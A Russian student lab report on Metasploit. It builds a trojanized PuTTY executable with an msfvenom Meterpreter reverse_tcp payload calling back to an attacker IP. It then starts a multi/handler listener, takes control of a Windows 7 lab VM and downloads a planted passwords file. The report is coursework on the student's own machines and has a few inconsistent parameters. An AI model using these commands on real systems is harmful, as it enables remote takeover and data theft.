Добавил:
Опубликованный материал нарушает ваши авторские права? Сообщите нам.
Вуз: Предмет: Файл:

_6

.docx
Скачиваний:
1
Добавлен:
28.11.2024
Размер:
511.13 Кб
Скачать

МИНОБРНАУКИ РОССИИ

Санкт-Петербургский государственный

электротехнический университет

«ЛЭТИ» им. В.И. Ульянова (Ленина)

Кафедра информационной безопасности

отчет

по практической работе 6

по дисциплине «Организационное и правовое обеспечение информационной безопасности»

Тема: Применение средств пентестинга

Студент гр. 1363

Соловьев М.И.

Преподаватель

Шашкин В.С.

Санкт-Петербург

2024

Цель работы.

Демонстрация возможности захвата удаленного управления чужой ПЭВМ.

Экспериментальные результаты.

Создадим локальную сеть из двух компьютеров с ОС Windows 7 и Kali Linux. На Kali Linux запустим утилиту “msfvenom”, которая является частью фреймворка “Metasploit”. Чтобы получить удаленный доступ к компьютеру используем команду:

msfvenom –p windows/meterpreter/reverse_tcp LHOST=192.168.233.129 LPORT=4441 –f exe –e x86\shikata_ga_nai -i 1 –k –x ‘/root/Desktop/PUTTY.EXE’ > /tmp/evil_putty.exe

Разберем команду по составляющим её ключам:

  • –p windows/meterpreter/reverse_tcp – вводим какой payload мы будем сейчас использовать;

  • LHOST=192.168.199.133 LPORT=4441 – указываем нашему payload ip- адрес машины с ОС Kali Linux. Порт мы выбираем сами, тот который у нас не занят;

  • –f exe – указываем наш выходной формат payload, в данном случае у нас будет exe – файл;

  • –e –ex86/shikata_ga_nai -i 1 – ключом –e указываем какой кодировщик будем применять, а ключом i – количество итераций шифрования, в нашем случае 13 раз;

  • -k – при этом ключе msfvenom создаст точную копию нашего файла (‘/root/Desktop/PUTTY.EXE’) вместе с функционалом, если его не указать, то выходной файл скопирует максимум иконку и при запуске ничего делать не будет;

  • –x ‘/root/Desktop/PUTTY.EXE’ – указываем какой файл мы будем копировать;

  • > /tmp/evil_putty.exe – указываем куда сохраняем файл и с каким названием.

Результат выполнения команды представлен на рисунке 1. Как можно заметить, она успешно выполнилась.

Рисунок 1 – Выполнение команды

Дальше нам необходимо запустить «слушателя» для соединения с payload. Слушатель будет ждать, когда наша жертва запустит payload. Дальше наша полезная нагрузка соединяется со слушателем и тогда мы сможем управлять нашим payload. Для этого необходимо прописать следующие команды:

service postgresql start

service metasploit start

Рисунок 2 – Выполнение команд для запуска слушателя

Далее запускаем msfconsole командой “msfconsole”. Последовательно пропишем команды:

use multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.199.133

set LPORT=4441

Рисунок 3 – Результат выполнения команд в консоли msfconsole

После того, как мы ввели все необходимые параметры можно запустить наш слушатель командой “exploit”.

Перейдем на компьютер с ОС Windows и запустим созданный нами зараженный файл “evil_putty.exe”.

Перейдем на компьютер с Kali Linux. Как можно заметить по рисунку 4, мы успешно получили доступ к компьютеру с ОС Windows.

Рисунок 4 – Выполнение команды “exploit”

Введем команду “ipconfig” и заметим, что мы получим IP-адрес машины с ОС Windows.

Рисунок 5 – Выполнение команды “ipconfig”

Вернемся на Windows-машину и создадим файл “passwords.txt”, в который добавим информацию о вымышленном пароле от электронной почты.

Рисунок 6 – Создание файла

Попробуем украсть этот файл с помощью утилиты “msfvenom”. Для этого воспользуемся командой “download passwords.txt”, которая позволит нам перенести желаемый файл на нашу систему.

Рисунок 7 – Кража файла

Проверим наличие нашего файла. Как можно заметить по рисунку 8, файл был успешно передан на систему Kali Linux.

Рисунок 8 – Проверка файла

Выводы.

В ходе выполнения работы был получен опыт работы с утилитой msfvenom. Нам удалось установить удаленный доступ к системе ОС Windows и передать на наш компьютер желаемый файл.

Соседние файлы в предмете [НЕСОРТИРОВАННОЕ]